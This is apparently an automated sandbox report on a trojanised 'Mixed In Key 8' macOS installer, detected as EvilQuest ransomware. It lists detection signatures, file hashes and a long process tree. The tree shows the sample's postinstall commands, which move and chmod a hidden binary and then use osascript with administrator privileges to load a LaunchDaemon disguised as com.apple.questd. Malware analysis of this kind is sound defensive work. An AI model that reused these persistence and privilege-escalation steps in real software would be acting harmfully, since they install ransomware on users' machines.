Play interactive tour

Edit tour

Analysis Report Mixed In Key 8.pkg

Overview

General Information

Sample Name:	Mixed In Key 8.pkg
Analysis ID:	808
MD5:	66405f4bb6db1136037fde9f43830119
SHA1:	0898cd7a55b55853ce9da0f0f360ec31ecec4974
SHA256:	9e8c30955ccb5797efaab676ffdf36fe08ce32d4aab4d18e1a9ed2be43d5db0f
Infos:
Most interesting Screenshot:

Detection

EvilQuest

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus detection for dropped file

Detected macOS EvilQuest ransomware

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected EvilQuest Ransomware

App bundle contains hidden files/directories

Contains functionality related to in-memory code execution

Contains functionality related to key logging

Contains symbols with suspicious names likely related to privilege escalation

Creates hidden Mach-O files

Deletes many files in the user directory

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Executes shell scripts with administrative rights

Executes the "sudo" command used to execute a command as another user

Might steal keychain information which contains credentials

Moves itself during installation or deletes itself after installation

Process executable has a file extension which is uncommon (probably to disguise the executable)

Process path indicates hidden application bundle (probably to disguise it)

Reads local browser cookies

Reads process information of other processes

Writes Mach-O files to untypical directories

Changes permissions of written Mach-O files

Contains symbols with suspicious names likely related to encryption

Contains symbols with suspicious names likely related to networking

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions

Creates application bundles

Creates code signed application bundles

Creates hidden files, links and/or directories

Creates memory-persistent launch services

Creates system-wide 'launchd' managed services aka launch daemons

Creates user-wide 'launchd' managed services aka launch agents

Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)

Explicitly loads/starts launch services

HTTP GET or POST without a user agent

Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)

Reads hardware related sysctl values

Reads launchservices plist files

Reads the systems OS release and/or type

Reads the systems hostname

Uses AppleScript framework/components containing Apple Script related functionalities

Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)

Writes 64-bit Mach-O files to disk

Writes RTF files to disk

Writes a file containing only its PID

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	808
Start date:	07.06.2021
Start time:	19:13:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Mixed In Key 8.pkg
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.rans.spyw.expl.evad.macPKG@0/1672@2/0
Warnings:	Show All Excluded IPs from analysis (whitelisted): 2.22.90.177, 2.18.233.84, 17.253.55.204 Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, mesu-cdn.origin-apple.com.akadns.net, valid.origin-apple.com.akadns.net, valid-apple.g.aaplimg.com, e6858.dscx.akamaiedge.net, mesu.apple.com, mesu.apple.com.edgekey.net, crl.g.aaplimg.com, crl.apple.com, crl-lb.apple.com.akadns.net, e1329.g.akamaiedge.net, valid.apple.com Report creation exceeded maximum number of non-whitelisted processes and may have missing process information. Report size exceeded maximum capacity and may have missing behavior information. VT rate limit hit for: http://www.id3.org/ID3v1

Process Tree

System is macvm-highsierra

xpcproxy New Fork (PID: 611, Parent: 1)

Installer (MD5: 2b8f384afb853369052069c49489032b) Arguments: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer

xpcproxy New Fork (PID: 619, Parent: 1)

installd (MD5: c2d8282e932e781e024c558ec4c8b3d2) Arguments: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd

install_monitor New Fork (PID: 631, Parent: 619)

shove New Fork (PID: 632, Parent: 619)

postinstall New Fork (PID: 633, Parent: 619)

sh New Fork (PID: 635, Parent: 633)

mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Library/mixednkey

sh New Fork (PID: 636, Parent: 633)

mv (MD5: 7f791dd4bef08d618fece911d6e3398a) Arguments: mv /Applications/Utils/patch /Library/mixednkey/toolroomd

sh New Fork (PID: 637, Parent: 633)

rmdir (MD5: bffabbed652aed3e9a609299e64d1097) Arguments: rmdir /Application/Utils

sh New Fork (PID: 638, Parent: 633)

chmod (MD5: 30e3e10a3e7ad9adfd37662b2e9b4f8a) Arguments: chmod +x /Library/mixednkey/toolroomd

sh New Fork (PID: 639, Parent: 633)

toolroomd (MD5: 322f4fb8f257a2e651b128c41df92b1d) Arguments: /Library/mixednkey/toolroomd

sh New Fork (PID: 642, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 643, Parent: 642)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 644, Parent: 643)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 646, Parent: 643)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 648, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 649, Parent: 648)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 650, Parent: 649)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 651, Parent: 649)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 652, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 653, Parent: 652)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 654, Parent: 653)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 655, Parent: 653)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 656, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 657, Parent: 656)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 658, Parent: 657)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 659, Parent: 657)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 672, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 674, Parent: 672)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 675, Parent: 674)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 676, Parent: 674)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 680, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 681, Parent: 680)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 682, Parent: 681)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 683, Parent: 681)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 684, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 685, Parent: 684)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 686, Parent: 685)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 687, Parent: 685)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 688, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 689, Parent: 688)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 690, Parent: 689)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 691, Parent: 689)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 692, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 693, Parent: 692)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 694, Parent: 693)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 695, Parent: 693)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 696, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 697, Parent: 696)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 698, Parent: 697)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 699, Parent: 697)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 723, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 724, Parent: 723)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 725, Parent: 724)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 726, Parent: 724)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 731, Parent: 639)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 732, Parent: 731)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 20 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 733, Parent: 732)

efw_cache_update New Fork (PID: 641, Parent: 619)

xpcproxy New Fork (PID: 645, Parent: 1)

sudo (MD5: 60ac5909d06d86e22aace3a863b13690) Arguments: sudo /Library/AppQuest/com.apple.questd --silent

sudo New Fork (PID: 647, Parent: 645)

com.apple.questd (MD5: 322f4fb8f257a2e651b128c41df92b1d) Arguments: /Library/AppQuest/com.apple.questd --silent

sh New Fork (PID: 660, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 661, Parent: 660)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 662, Parent: 661)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 663, Parent: 661)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 664, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 665, Parent: 664)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 666, Parent: 665)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 667, Parent: 665)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 668, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 669, Parent: 668)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 16 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 670, Parent: 669)

